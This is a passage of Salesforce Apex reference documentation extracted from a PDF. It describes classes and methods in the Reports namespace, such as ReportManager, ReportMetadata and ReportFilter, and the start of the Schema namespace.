ReportDescribeResult Methods
The following are methods for ReportDescribeResult. All are instance methods.
IN THIS SECTION:
getReportExtendedMetadata()
Returns additional information about grouping and summaries.
getReportMetadata()
Returns unique identifiers for groupings and summaries.
getReportTypeMetadata()
Returns the fields in each section of a report type, plus filtering information for those fields.
getReportExtendedMetadata()
Returns additional information about grouping and summaries.
Syntax
public Reports.ReportExtendedMetadata getReportExtendedMetadata()
Return Value
Type: Reports.ReportExtendedMetadata
1240
Reference
ReportDetailRow Class
getReportMetadata()
Returns unique identifiers for groupings and summaries.
Syntax
public Reports.ReportMetadata getReportMetadata()
Return Value
Type: Reports.ReportMetadata
getReportTypeMetadata()
Returns the fields in each section of a report type, plus filtering information for those fields.
Syntax
public Reports.ReportTypeMetadata getReportTypeMetadata()
Return Value
Type: Reports.ReportTypeMetadata
ReportDetailRow Class
Contains data cells for a detail row of a report.
Namespace
Reports
ReportDetailRow Methods
The following are methods for ReportDetailRow. All are instance methods.
IN THIS SECTION:
getDataCells()
Returns a list of data cells for a detail row.
getDataCells()
Returns a list of data cells for a detail row.
Syntax
public LIST<Reports.ReportDataCell> getDataCells()
1241
Reference
ReportExtendedMetadata Class
Return Value
Type: List<Reports.ReportDataCell>
ReportExtendedMetadata Class
Contains report extended metadata for a tabular, summary, or matrix report.
Namespace
Reports
Report extended metadata provides additional, detailed metadata about summary and grouping fields, including data type and label
information.
ReportExtendedMetadata Methods
The following are methods for ReportExtendedMetadata. All are instance methods.
IN THIS SECTION:
getAggregateColumnInfo()
Returns all report summaries such as Record Count, Sum, Average, Max, Min, and custom summary formulas. Contains
values for each summary that is listed in the report metadata.
getDetailColumnInfo()
Returns a map of two properties for each field that has detailed data identified by its unique API name. The detailed data fields are
also listed in the report metadata.
getGroupingColumnInfo()
Returns a map of each row or column grouping to its metadata. Contains values for each grouping that is identified in the
groupingsDown and groupingsAcross lists.
getAggregateColumnInfo()
Returns all report summaries such as Record Count, Sum, Average, Max, Min, and custom summary formulas. Contains values
for each summary that is listed in the report metadata.
Syntax
public MAP<String,Reports.AggregateColumn> getAggregateColumnInfo()
Return Value
Type: Map<String,Reports.AggregateColumn>
getDetailColumnInfo()
Returns a map of two properties for each field that has detailed data identified by its unique API name. The detailed data fields are also
listed in the report metadata.
1242
Reference
ReportFact Class
Syntax
public MAP<String,Reports.DetailColumn> getDetailColumnInfo()
Return Value
Type: Map<String,Reports.DetailColumn>
getGroupingColumnInfo()
Returns a map of each row or column grouping to its metadata. Contains values for each grouping that is identified in the groupingsDown
and groupingsAcross lists.
Syntax
public MAP<String,Reports.GroupingColumn> getGroupingColumnInfo()
Return Value
Type: Map<String,Reports.GroupingColumn>
ReportFact Class
Contains the fact map for the report, which represents the reports data values.
Namespace
Reports
Usage
ReportFact is the parent class of ReportFactWithDetails. If includeDetails is true when the report is run, the
fact map is a ReportFactWithDetails object.
ReportFact Methods
The following are methods for ReportFact. All are instance methods.
IN THIS SECTION:
getAggregates()
Returns summary-level data for a report, including the record count.
getKey()
Returns the unique identifier for a row or column grouping. This identifier can be used to index specific data values within each
grouping.
getAggregates()
Returns summary-level data for a report, including the record count.
1243
Reference
ReportFactWithDetails Class
Syntax
public LIST<Reports.SummaryValue> getAggregates()
Return Value
Type: List<Reports.SummaryValue>
getKey()
Returns the unique identifier for a row or column grouping. This identifier can be used to index specific data values within each grouping.
Syntax
public String getKey()
Return Value
Type: String
ReportFactWithDetails Class
Contains the detailed fact map for the report, which represents the reports data values.
Namespace
Reports
Usage
The ReportFactWithDetails class extends the ReportFact class. A ReportFactWithDetails object is returned if
includeDetails is set to true when the report is run. To access the detail values, youll need to cast the return value of the
ReportResults.getFactMap method to a ReportFactWithDetails object.
ReportFactWithDetails Methods
The following are methods for ReportFactWithDetails. All are instance methods.
IN THIS SECTION:
getAggregates()
Returns summary-level data for a report, including the record count.
getKey()
Returns the unique identifier for a row or column grouping. This identifier can be used to index specific data values within each
grouping.
getRows()
Returns a list of detailed report data in the order of the detail columns that are provided by the report metadata.
1244
Reference
ReportFilter Class
getAggregates()
Returns summary-level data for a report, including the record count.
Syntax
public LIST<Reports.SummaryValue> getAggregates()
Return Value
Type: List<Reports.SummaryValue>
getKey()
Returns the unique identifier for a row or column grouping. This identifier can be used to index specific data values within each grouping.
Syntax
public String getKey()
Return Value
Type: String
getRows()
Returns a list of detailed report data in the order of the detail columns that are provided by the report metadata.
Syntax
public LIST<Reports.ReportDetailRow> getRows()
Return Value
Type: List<Reports.ReportDetailRow>
ReportFilter Class
Contains information about a report filter, including column, operator, and value.
Namespace
Reports
IN THIS SECTION:
ReportFilter Constructors
ReportFilter Methods
1245
Reference
ReportFilter Class
ReportFilter Constructors
The following are constructors for ReportFilter.
IN THIS SECTION:
ReportFilter()
Creates a new instance of the Reports.ReportFilter class. You can then set values by using the set methods.
ReportFilter(String, String, String)
Creates a new instance of the Reports.ReportFilter class by using the specified parameters.
ReportFilter()
Creates a new instance of the Reports.ReportFilter class. You can then set values by using the set methods.
Signature
public ReportFilter()
Signature
public ReportFilter(String, String, String)
Parameters
column
Type: String
operator
Type: String
value
Type: String
ReportFilter Methods
The following are methods for ReportFilter. All are instance methods.
IN THIS SECTION:
getColumn()
Returns the unique API name for the field thats being filtered.
getOperator()
Returns the unique API name for the condition that is used to filter a field, such as greater than or not equal to. Filter conditions
depend on the data type of the field.
1246
Reference
ReportFilter Class
getValue()
Returns the value by which a field can be filtered. For example, the field Age can be filtered by a numeric value.
setColumn(String)
Sets the unique API name for the field thats being filtered.
setOperator(String)
Sets the unique API name for the condition that is used to filter a field, such as greater than or not equal to. Filter conditions
depend on the data type of the field.
setValue(String)
Sets the value by which a field can be filtered. For example, the field Age can be filtered by a numeric value.
getColumn()
Returns the unique API name for the field thats being filtered.
Syntax
public String getColumn()
Return Value
Type: String
getOperator()
Returns the unique API name for the condition that is used to filter a field, such as greater than or not equal to. Filter conditions
depend on the data type of the field.
Syntax
public String getOperator()
Return Value
Type: String
getValue()
Returns the value by which a field can be filtered. For example, the field Age can be filtered by a numeric value.
Syntax
public String getValue()
Return Value
Type: String
1247
Reference
ReportFilter Class
setColumn(String)
Sets the unique API name for the field thats being filtered.
Syntax
public Void setColumn(String column)
Parameters
column
Type: String
Return Value
Type: Void
setOperator(String)
Sets the unique API name for the condition that is used to filter a field, such as greater than or not equal to. Filter conditions depend
on the data type of the field.
Syntax
public Void setOperator(String operator)
Parameters
operator
Type: String
Return Value
Type: Void
setValue(String)
Sets the value by which a field can be filtered. For example, the field Age can be filtered by a numeric value.
Syntax
public Void setValue(String value)
Parameters
value
Type: String
Return Value
Type: Void
1248
Reference
ReportFormat Enum
ReportFormat Enum
Contains the possible report format types.
Namespace
Reports
Enum Values
The following are the values of the Reports.ReportFormat enum.
Value
Description
MATRIX
SUMMARY
TABULAR
ReportInstance Class
Returns an instance of a report that was run asynchronously. Retrieves the results for that instance.
Namespace
Reports
ReportInstance Methods
The following are methods for ReportInstance. All are instance methods.
IN THIS SECTION:
getCompletionDate()
Returns the date and time when the instance of the report finished running. The completion date is available only if the report
instance ran successfully or couldnt be run because of an error. Date and time information is in ISO-8601 format.
getId()
Returns the unique ID for an instance of a report that was run asynchronously.
getOwnerId()
Returns the ID of the user who created the report instance.
getReportId()
Returns the unique ID of the report this instance is based on.
getReportResults()
Retrieves results for an instance of an asynchronous report. When you request your report, you can specify whether to summarize
data or include details.
1249
Reference
ReportInstance Class
getRequestDate()
Returns the date and time when an instance of the report was run. Date and time information is in ISO-8601 format.
getStatus()
Returns the status of a report.
getCompletionDate()
Returns the date and time when the instance of the report finished running. The completion date is available only if the report instance
ran successfully or couldnt be run because of an error. Date and time information is in ISO-8601 format.
Syntax
public Datetime getCompletionDate()
Return Value
Type: Datetime
getId()
Returns the unique ID for an instance of a report that was run asynchronously.
Syntax
public Id getId()
Return Value
Type: Id
getOwnerId()
Returns the ID of the user who created the report instance.
Syntax
public Id getOwnerId()
Return Value
Type: Id
getReportId()
Returns the unique ID of the report this instance is based on.
Syntax
public Id getReportId()
1250
Reference
ReportInstance Class
Return Value
Type: Id
getReportResults()
Retrieves results for an instance of an asynchronous report. When you request your report, you can specify whether to summarize data
or include details.
Syntax
public Reports.ReportResults getReportResults()
Return Value
Type: Reports.ReportResults
getRequestDate()
Returns the date and time when an instance of the report was run. Date and time information is in ISO-8601 format.
Syntax
public Datetime getRequestDate()
Return Value
Type: Datetime
getStatus()
Returns the status of a report.
Syntax
public String getStatus()
Return Value
Type: String
Usage
New if the report run was recently triggered through a request.
Success if the report ran.
Running if the report is being run.
Error if the report run failed. The instance of a report run can return an error if, for example, your permission to access the report
was removed after you requested the run.
1251
Reference
ReportManager Class
ReportManager Class
Runs a report synchronously or asynchronously and with or without details.
Namespace
Reports
Usage
Gets instances of reports and describes the metadata of Reports.
ReportManager Methods
The following are methods for ReportManager. All methods are static.
IN THIS SECTION:
describeReport(Id)
Retrieves report, report type, and extended metadata for a tabular, summary, or matrix report.
getDatatypeFilterOperatorMap()
Lists the field data types that you can use to filter the report.
getReportInstance(Id)
Retrieves results for an instance of a report that has been run asynchronously. The settings you use when you run your asynchronous
report determine whether you can retrieve summary data or detailed data.
getReportInstances(Id)
Returns a list of instances for a report that was run asynchronously. Each item in the list represents a separate instance of the report,
with metadata for the time at which the report was run.
runAsyncReport(Id, Reports.ReportMetadata, Boolean)
Runs a report asynchronously with the report ID. Includes details if includeDetails is set to true. Filters the report based
on the report metadata in rmData.
runAsyncReport(Id, Boolean)
Runs a report asynchronously with the report ID. Includes details if includeDetails is set to true.
runAsyncReport(Id, Reports.ReportMetadata)
Runs a report asynchronously with the report ID. Filters the results based on the report metadata in rmData.
runAsyncReport(Id)
Runs a report asynchronously with the report ID.
runReport(Id, Reports.ReportMetadata, Boolean)
Runs a report immediately with the report ID. Includes details if includeDetails is set to true. Filters the results based on
the report metadata in rmData.
runReport(Id, Boolean)
Runs a report immediately with the report ID. Includes details if includeDetails is set to true.
runReport(Id, Reports.ReportMetadata)
Runs a report immediately with the report ID. Filters the results based on the report metadata in rmData.
1252
Reference
ReportManager Class
runReport(Id)
Runs a report immediately with the report ID.
describeReport(Id)
Retrieves report, report type, and extended metadata for a tabular, summary, or matrix report.
Syntax
public static Reports.ReportDescribeResult describeReport(Id reportId)
Parameters
reportId
Type: Id
Return Value
Type: Reports.ReportDescribeResult
getDatatypeFilterOperatorMap()
Lists the field data types that you can use to filter the report.
Syntax
public static MAP<String,LIST<Reports.FilterOperator>> getDatatypeFilterOperatorMap()
Return Value
Type: Map<String, List<Reports.FilterOperator>>
getReportInstance(Id)
Retrieves results for an instance of a report that has been run asynchronously. The settings you use when you run your asynchronous
report determine whether you can retrieve summary data or detailed data.
Syntax
public static Reports.ReportInstance getReportInstance(Id instanceId)
Parameters
instanceId
Type: Id
Return Value
Type: Reports.ReportInstance
1253
Reference
ReportManager Class
getReportInstances(Id)
Returns a list of instances for a report that was run asynchronously. Each item in the list represents a separate instance of the report, with
metadata for the time at which the report was run.
Syntax
public static LIST<Reports.ReportInstance> getReportInstances(Id reportId)
Parameters
reportId
Type: Id
Return Value
Type: List<Reports.ReportInstance>
Syntax
public static Reports.ReportInstance runAsyncReport(Id reportId, Reports.ReportMetadata
rmData, Boolean includeDetails)
Parameters
reportId
Type: Id
rmData
Type: Reports.ReportMetadata
includeDetails
Type: Boolean
Return Value
Type: Reports.ReportInstance
runAsyncReport(Id, Boolean)
Runs a report asynchronously with the report ID. Includes details if includeDetails is set to true.
Syntax
public static Reports.ReportInstance runAsyncReport(Id reportId, Boolean includeDetails)
1254
Reference
ReportManager Class
Parameters
reportId
Type: Id
includeDetails
Type: Boolean
Return Value
Type: Reports.ReportInstance
runAsyncReport(Id, Reports.ReportMetadata)
Runs a report asynchronously with the report ID. Filters the results based on the report metadata in rmData.
Syntax
public static Reports.ReportInstance runAsyncReport(Id reportId, Reports.ReportMetadata
rmData)
Parameters
reportId
Type: Id
rmData
Type: Reports.ReportMetadata
Return Value
Type: Reports.ReportInstance
runAsyncReport(Id)
Runs a report asynchronously with the report ID.
Syntax
public static Reports.ReportInstance runAsyncReport(Id reportId)
Parameters
reportId
Type: Id
Return Value
Type: Reports.ReportInstance
1255
Reference
ReportManager Class
Syntax
public static Reports.ReportResults runReport(Id reportId, Reports.ReportMetadata
rmData, Boolean includeDetails)
Parameters
reportId
Type: Id
rmData
Type: Reports.ReportMetadata
includeDetails
Type: Boolean
Return Value
Type: Reports.ReportResults
runReport(Id, Boolean)
Runs a report immediately with the report ID. Includes details if includeDetails is set to true.
Syntax
public static Reports.ReportResults runReport(Id reportId, Boolean includeDetails)
Parameters
reportId
Type: Id
includeDetails
Type: Boolean
Return Value
Type: Reports.ReportResults
runReport(Id, Reports.ReportMetadata)
Runs a report immediately with the report ID. Filters the results based on the report metadata in rmData.
Syntax
public static Reports.ReportResults runReport(Id reportId, Reports.ReportMetadata
rmData)
1256
Reference
ReportMetadata Class
Parameters
reportId
Type: Id
rmData
Type: Reports.ReportMetadata
Return Value
Type: Reports.ReportResults
runReport(Id)
Runs a report immediately with the report ID.
Syntax
public static Reports.ReportResults runReport(Id reportId)
Parameters
reportId
Type: Id
Return Value
Type: Reports.ReportResults
ReportMetadata Class
Contains report metadata for a tabular, summary, or matrix report.
Namespace
Reports
Usage
Report metadata gives information about the report as a whole, such as the report type, format, summary fields, row or column groupings,
and filters that are saved to the report. You can use the ReportMetadata class to retrieve report metadata and to set metadata
that can be used to filter a report.
ReportMetadata Methods
The following are methods for ReportMetadata. All are instance methods.
IN THIS SECTION:
getAggregates()
Returns unique identifiers for summary or custom summary formula fields in the report.
1257
Reference
ReportMetadata Class
getCurrencyCode()
Returns report currency, such as USD, EUR, or GBP, for an organization that has multicurrency enabled. The value is null if the
organization does not have multicurrency enabled.
getDetailColumns()
Returns unique API names (column names) for the fields that contain detailed data. For example, the method might return the
following values: OPPORTUNITY_NAME, TYPE, LEAD_SOURCE, AMOUNT.
getDeveloperName()
Returns the report API name. For example, the method might return the following value: Closed_Sales_This_Quarter.
getGroupingsAcross()
Returns the unique identifiers for each column grouping in a report.
getGroupingsDown()
Returns the unique identifiers for each row grouping in a report.
getHistoricalSnapshotDates()
Returns a list of historical snapshot dates.
getId()
Returns the unique report ID.
getName()
Returns the report name.
getReportBooleanFilter()
Returns logic to parse custom field filters. The value is null when filter logic is not specified.
getReportFilters()
Returns a list of each custom filter in the report along with the field name, filter operator, and filter value.
getReportFormat()
Returns the format of the report.
getReportType()
Returns the unique API name and display name for the report type.
setHistoricalSnapshotDates(LIST<String>)
Sets a list of historical snapshot dates.
setReportBooleanFilter(String)
Sets logic to parse custom field filters.
setReportFilters(LIST<Reports.ReportFilter>)
Sets a list of each custom filter in the report along with the field name, filter operator, and filter value.
getAggregates()
Returns unique identifiers for summary or custom summary formula fields in the report.
Syntax
public LIST<String> getAggregates()
1258
Reference
ReportMetadata Class
Return Value
Type: List<String>
Usage
For example:
a!Amount represents the average for the Amount column.
s!Amount represents the sum of the Amount column.
m!Amount represents the minimum value of the Amount column.
x!Amount represents the maximum value of the Amount column.
s!<customfieldID> represents the sum of a custom field column. For custom fields and custom report types, the identifier
is a combination of the summary type and the field ID.
getCurrencyCode()
Returns report currency, such as USD, EUR, or GBP, for an organization that has multicurrency enabled. The value is null if the
organization does not have multicurrency enabled.
Syntax
public String getCurrencyCode()
Return Value
Type: String
getDetailColumns()
Returns unique API names (column names) for the fields that contain detailed data. For example, the method might return the following
values: OPPORTUNITY_NAME, TYPE, LEAD_SOURCE, AMOUNT.
Syntax
public LIST<String> getDetailColumns()
Return Value
Type: List<String>
getDeveloperName()
Returns the report API name. For example, the method might return the following value: Closed_Sales_This_Quarter.
Syntax
public String getDeveloperName()
1259
Reference
ReportMetadata Class
Return Value
Type: String
getGroupingsAcross()
Returns the unique identifiers for each column grouping in a report.
Syntax
public LIST<Reports.GroupingInfo> getGroupingsAcross()
Return Value
Type: List<Reports.GroupingInfo>
Usage
The identifier is:
An empty array for reports in summary format, because summary reports don't include column groupings
BucketField_(ID) for bucket fields
The ID of a custom field when the custom field is used for a column grouping
getGroupingsDown()
Returns the unique identifiers for each row grouping in a report.
Syntax
public LIST<Reports.GroupingInfo> getGroupingsDown()
Return Value
Type: List<Reports.GroupingInfo>
Usage
The identifier is:
BucketField_(ID) for bucket fields
The ID of a custom field when the custom field is used for grouping
getHistoricalSnapshotDates()
Returns a list of historical snapshot dates.
Syntax
public LIST<String> getHistoricalSnapshotDates()
1260
Reference
ReportMetadata Class
Return Value
Type: List<String>
getId()
Returns the unique report ID.
Syntax
public Id getId()
Return Value
Type: Id
getName()
Returns the report name.
Syntax
public String getName()
Return Value
Type: String
getReportBooleanFilter()
Returns logic to parse custom field filters. The value is null when filter logic is not specified.
Syntax
public String getReportBooleanFilter()
Return Value
Type: String
getReportFilters()
Returns a list of each custom filter in the report along with the field name, filter operator, and filter value.
Syntax
public LIST<Reports.ReportFilter> getReportFilters()
Return Value
Type: List<Reports.ReportFilter>
1261
Reference
ReportMetadata Class
getReportFormat()
Returns the format of the report.
Syntax
public Reports.ReportFormat getReportFormat()
Return Value
Type: Reports.ReportFormat
Usage
This value can be:
TABULAR
SUMMARY
MATRIX
getReportType()
Returns the unique API name and display name for the report type.
Syntax
public Reports.ReportType getReportType()
Return Value
Type: Reports.ReportType
setHistoricalSnapshotDates(LIST<String>)
Sets a list of historical snapshot dates.
Syntax
public Void setHistoricalSnapshotDates(LIST<String> historicalSnapshot)
Parameters
historicalSnapshot
Type: List<String>
Return Value
Type: Void
1262
Reference
ReportResults Class
setReportBooleanFilter(String)
Sets logic to parse custom field filters.
Syntax
public Void setReportBooleanFilter(String reportBooleanFilter)
Parameters
reportBooleanFilter
Type: String
Return Value
Type: Void
setReportFilters(LIST<Reports.ReportFilter>)
Sets a list of each custom filter in the report along with the field name, filter operator, and filter value.
Syntax
public Void setReportFilters(LIST<Reports.ReportFilter> reportFilters)
Parameters
reportFilters
Type: List<Reports.ReportFilter>
Return Value
Type: Void
ReportResults Class
Contains the results of running a report.
Namespace
Reports
ReportResults Methods
The following are methods for ReportResults. All are instance methods.
IN THIS SECTION:
getAllData()
Returns all report data.
1263
Reference
ReportResults Class
getFactMap()
Returns summary-level data or summary and detailed data for each row or column grouping. Detailed data is available if the
includeDetails parameter is set to true when the report is run.
getGroupingsAcross()
Returns a collection of column groupings, keys, and values.
getGroupingsDown()
Returns a collection of row groupings, keys, and values.
getHasDetailRows()
Returns information about whether the fact map has detail rows.
getReportExtendedMetadata()
Returns additional, detailed metadata about the report, including data type and label information for groupings and summaries.
getReportMetadata()
Returns metadata about the report, including grouping and summary information.
getAllData()
Returns all report data.
Syntax
public Boolean getAllData()
Return Value
Type: Boolean
Usage
When true, indicates that all report results are returned.
When false, indicates that results are returned for the same number of rows as in a report run in Salesforce.
Note: For reports that contain too many records, use filters to refine results.
getFactMap()
Returns summary-level data or summary and detailed data for each row or column grouping. Detailed data is available if the
includeDetails parameter is set to true when the report is run.
Syntax
public MAP<String,Reports.ReportFact> getFactMap()
Return Value
Type: Map<String,Reports.ReportFact>
1264
Reference
ReportResults Class
getGroupingsAcross()
Returns a collection of column groupings, keys, and values.
Syntax
public Reports.Dimension getGroupingsAcross()
Return Value
Type: Reports.Dimension
getGroupingsDown()
Returns a collection of row groupings, keys, and values.
Syntax
public Reports.Dimension getGroupingsDown()
Return Value
Type: Reports.Dimension
getHasDetailRows()
Returns information about whether the fact map has detail rows.
Syntax
public Boolean getHasDetailRows()
Return Value
Type: Boolean
Usage
When true, indicates that the fact map returns values for summary-level and record-level data.
When false, indicates that the fact map returns summary values.
getReportExtendedMetadata()
Returns additional, detailed metadata about the report, including data type and label information for groupings and summaries.
Syntax
public Reports.ReportExtendedMetadata getReportExtendedMetadata()
1265
Reference
ReportType Class
Return Value
Type: Reports.ReportExtendedMetadata
getReportMetadata()
Returns metadata about the report, including grouping and summary information.
Syntax
public Reports.ReportMetadata getReportMetadata()
Return Value
Type: Reports.ReportMetadata
ReportType Class
Contains the unique API name and display name for the report type.
Namespace
Reports
ReportType Methods
The following are methods for ReportType. All are instance methods.
IN THIS SECTION:
getLabel()
Returns the localized display name of the report type.
getType()
Returns the unique identifier of the report type.
getLabel()
Returns the localized display name of the report type.
Syntax
public String getLabel()
Return Value
Type: String
getType()
Returns the unique identifier of the report type.
1266
Reference
ReportTypeColumn Class
Syntax
public String getType()
Return Value
Type: String
ReportTypeColumn Class
Contains detailed report type metadata about a field, including data type, display name, and filter values.
Namespace
Reports
ReportTypeColumn Methods
The following are methods for ReportTypeColumn. All are instance methods.
IN THIS SECTION:
getDataType()
Returns the data type of the field.
getFilterValues()
If the field data type is picklist, multi-select picklist, boolean, or checkbox, returns all filter values for a field. For example, checkbox
fields always have a value of true or false. For fields of other data types, the filter value is an empty array, because their values
cant be determined.
getFilterable()
If the field is of a type that cant be filtered, returns False. For example, fields of the type Encrypted Text cant be filtered.
getLabel()
Returns the localized display name of the field.
getName()
Returns the unique API name of the field.
getDataType()
Returns the data type of the field.
Syntax
public Reports.ColumnDataType getDataType()
Return Value
Type: Reports.ColumnDataType
1267
Reference
ReportTypeColumn Class
getFilterValues()
If the field data type is picklist, multi-select picklist, boolean, or checkbox, returns all filter values for a field. For example, checkbox fields
always have a value of true or false. For fields of other data types, the filter value is an empty array, because their values cant be
determined.
Syntax
public LIST<Reports.FilterValue> getFilterValues()
Return Value
Type: List<Reports.FilterValue>
getFilterable()
If the field is of a type that cant be filtered, returns False. For example, fields of the type Encrypted Text cant be filtered.
Syntax
public Boolean getFilterable()
Return Value
Type: Boolean
getLabel()
Returns the localized display name of the field.
Syntax
public String getLabel()
Return Value
Type: String
getName()
Returns the unique API name of the field.
Syntax
public String getName()
Return Value
Type: String
1268
Reference
ReportTypeColumnCategory Class
ReportTypeColumnCategory Class
Contains category information for all fields in the report type.
Namespace
Reports
ReportTypeColumnCategory Methods
The following are methods for ReportTypeColumnCategory. All are instance methods.
IN THIS SECTION:
getColumns()
Returns information for all fields in the report type. The information is organized by each sections unique API name.
getLabel()
Returns the localized display name of a section in the report type under which fields are organized. For example, in an Accounts
with Contacts custom report type, Account General is the display name of the section that contains fields on general account
information.
getColumns()
Returns information for all fields in the report type. The information is organized by each sections unique API name.
Syntax
public MAP<String,Reports.ReportTypeColumn> getColumns()
Return Value
Type: Map<String,Reports.ReportTypeColumn>
getLabel()
Returns the localized display name of a section in the report type under which fields are organized. For example, in an Accounts with
Contacts custom report type, Account General is the display name of the section that contains fields on general account information.
Syntax
public String getLabel()
Return Value
Type: String
1269
Reference
ReportTypeMetadata Class
ReportTypeMetadata Class
Contains report type metadata, which gives you information about the fields that are available in each section of the report type, plus
filter information for those fields.
Namespace
Reports
ReportTypeMetadata Methods
The following are methods for ReportTypeMetadata. All are instance methods.
IN THIS SECTION:
getCategories()
Returns all fields in the report type. The fields are organized by section.
getCategories()
Returns all fields in the report type. The fields are organized by section.
Syntax
public LIST<Reports.ReportTypeColumnCategory> getCategories()
Return Value
Type: List<Reports.ReportTypeColumnCategory>
SummaryValue Class
Contains summary data for a cell of the report.
Namespace
Reports
SummaryValue Methods
The following are methods for SummaryValue. All are instance methods.
IN THIS SECTION:
getLabel()
Returns the formatted summary data for a specified cell.
getValue()
Returns the numeric value of the summary data for a specified cell.
1270
Reference
Reports Exceptions
getLabel()
Returns the formatted summary data for a specified cell.
Syntax
public String getLabel()
Return Value
Type: String
getValue()
Returns the numeric value of the summary data for a specified cell.
Syntax
public Object getValue()
Return Value
Type: Object
Reports Exceptions
The Reports namespace contains exception classes.
All exception classes support built-in methods for returning the error message and exception type. See Exception Class and Built-In
Exceptions on page 1469.
The Reports namespace contains these exceptions:
Exception
Description
Methods
instance
Reports.InvalidFilterException Filter validation error
filter errors
Reports.InvalidReportMetadataException Missing metadata for
filters
List<String> getReportMetadataErrors()
format
Reports.MetadataException
No selected report
columns
Reports.ReportRunException
1271
Reference
Schema Namespace
Exception
Description
Methods
running reports
Schema Namespace
The Schema namespace provides classes and methods for schema metadata information.
The following are the classes in the Schema namespace.
IN THIS SECTION:
ChildRelationship Class
Contains methods for accessing the child relationship as well as the child sObject for a parent sObject.
DataCategory Class
Represents the categories within a category group.
DataCategoryGroupSobjectTypePair Class
Specifies a category group and an associated object.
DescribeColorResult Class
Contains color metadata information for a tab.
DescribeDataCategoryGroupResult Class
Contains the list of the category groups associated with KnowledgeArticleVersion and Question.
DescribeDataCategoryGroupStructureResult Class
Contains the category groups and categories associated with KnowledgeArticleVersion and Question.
DescribeFieldResult Class
Contains methods for describing sObject fields.
DescribeIconResult Class
Contains icon metadata information for a tab.
DescribeSObjectResult Class
Contains methods for describing sObjects.
DescribeTabResult Class
Contains tab metadata information for a tab in a standard or custom app available in the Salesforce user interface.
DescribeTabSetResult Class
Contains metadata information about a standard or custom app available in the Salesforce user interface.
DisplayType Enum
A Schema.DisplayType enum value is returned by the field describe result's getType method.
FieldSet Class
Contains methods for discovering and retrieving the details of field sets created on sObjects.
FieldSetMember Class
Contains methods for accessing the metadata for field set member fields.
1272
Reference
ChildRelationship Class
PicklistEntry Class
Represents a picklist entry.
RecordTypeInfo Class
Contains methods for accessing record type information for an sObject with associated record types.
SOAPType Enum
A Schema.SOAPType enum value is returned by the field describe result getSoapType method.
SObjectField Class
A Schema.sObjectField object is returned from the field describe result using the getControler and
getSObjectField methods.
SObjectType Class
A Schema.sObjectType object is returned from the field describe result using the getReferenceTo method, or from
the sObject describe result using the getSObjectType method.
ChildRelationship Class
Contains methods for accessing the child relationship as well as the child sObject for a parent sObject.
Namespace
Schema
Example
A ChildRelationship object is returned from the sObject describe result using the getChildRelationship method. For example:
Schema.DescribeSObjectResult R = Account.SObjectType.getDescribe();
List<Schema.ChildRelationship> C = R.getChildRelationships();
ChildRelationship Methods
The following are methods for ChildRelationship. All are instance methods.
IN THIS SECTION:
getChildSObject()
Returns the token of the child sObject on which there is a foreign key back to the parent sObject.
getField()
Returns the token of the field that has a foreign key back to the parent sObject.
getRelationshipName()
Returns the name of the relationship.
isCascadeDelete()
Returns true if the child object is deleted when the parent object is deleted, false otherwise.
isDeprecatedAndHidden()
Reserved for future use.
1273
Reference
ChildRelationship Class
isRestrictedDelete()
Returns true if the parent object can't be deleted because it is referenced by a child object, false otherwise.
getChildSObject()
Returns the token of the child sObject on which there is a foreign key back to the parent sObject.
Signature
public Schema.SObjectType getChildSObject()
Return Value
Type: Schema.SObjectType
getField()
Returns the token of the field that has a foreign key back to the parent sObject.
Signature
public Schema.SObjectField getField()
Return Value
Type: Schema.SObjectField
getRelationshipName()
Returns the name of the relationship.
Signature
public String getRelationshipName()
Return Value
Type: String
isCascadeDelete()
Returns true if the child object is deleted when the parent object is deleted, false otherwise.
Signature
public Boolean isCascadeDelete()
Return Value
Type: Boolean
1274
Reference
DataCategory Class
isDeprecatedAndHidden()
Reserved for future use.
Signature
public Boolean isDeprecatedAndHidden()
Return Value
Type: Boolean
isRestrictedDelete()
Returns true if the parent object can't be deleted because it is referenced by a child object, false otherwise.
Signature
public Boolean isRestrictedDelete()
Return Value
Type: Boolean
DataCategory Class
Represents the categories within a category group.
Namespace
Schema
Usage
The Schema.DataCategory object is returned by the getTopCategories method.
DataCategory Methods
The following are methods for DataCategory. All are instance methods.
IN THIS SECTION:
getChildCategories()
Returns a recursive object that contains the visible sub categories in the data category.
getLabel()
Returns the label for the data category used in the Salesforce user interface.
getName()
Returns the unique name used by the API to access to the data category.
1275
Reference
DataCategoryGroupSobjectTypePair Class
getChildCategories()
Returns a recursive object that contains the visible sub categories in the data category.
Signature
public Schema.DataCategory getChildCategories()
Return Value
Type: List<Schema.DataCategory>
getLabel()
Returns the label for the data category used in the Salesforce user interface.
Signature
public String getLabel()
Return Value
Type: String
getName()
Returns the unique name used by the API to access to the data category.
Signature
public String getName()
Return Value
Type: String
DataCategoryGroupSobjectTypePair Class
Specifies a category group and an associated object.
Namespace
Schema
Usage
Schema.DataCategoryGroupSobjectTypePair is used by the describeDataCategory GroupStructures method to return
the categories available to this object.
1276
Reference
DataCategoryGroupSobjectTypePair Class
IN THIS SECTION:
DataCategoryGroupSobjectTypePair Constructors
DataCategoryGroupSobjectTypePair Methods
DataCategoryGroupSobjectTypePair Constructors
The following are constructors for DataCategoryGroupSobjectTypePair.
IN THIS SECTION:
DataCategoryGroupSobjectTypePair()
Creates a new instance of the Schema.DataCategoryGroupSobjectTypePair class.
DataCategoryGroupSobjectTypePair()
Creates a new instance of the Schema.DataCategoryGroupSobjectTypePair class.
Signature
public DataCategoryGroupSobjectTypePair()
DataCategoryGroupSobjectTypePair Methods
The following are methods for DataCategoryGroupSobjectTypePair. All are instance methods.
IN THIS SECTION:
getDataCategoryGroupName()
Returns the unique name used by the API to access the data category group.
getSobject()
Returns the object name associated with the data category group.
setDataCategoryGroupName(String)
Specifies the unique name used by the API to access the data category group.
setSobject(String)
Sets the sObject associated with the data category group.
getDataCategoryGroupName()
Returns the unique name used by the API to access the data category group.
Signature
public String getDataCategoryGroupName()
Return Value
Type: String
1277
Reference
DataCategoryGroupSobjectTypePair Class
getSobject()
Returns the object name associated with the data category group.
Signature
public String getSobject()
Return Value
Type: String
setDataCategoryGroupName(String)
Specifies the unique name used by the API to access the data category group.
Signature
public String setDataCategoryGroupName(String name)
Parameters
name
Type: String
Return Value
Type: Void
setSobject(String)
Sets the sObject associated with the data category group.
Signature
public Void setSobject(String sObjectName)
Parameters
sObjectName
Type: String
The sObjectName is the object name associated with the data category group. Valid values are:
KnowledgeArticleVersionfor article types.
Questionfor questions from Answers.
Return Value
Type: Void
1278
Reference
DescribeColorResult Class
DescribeColorResult Class
Contains color metadata information for a tab.
Namespace
Schema
Usage
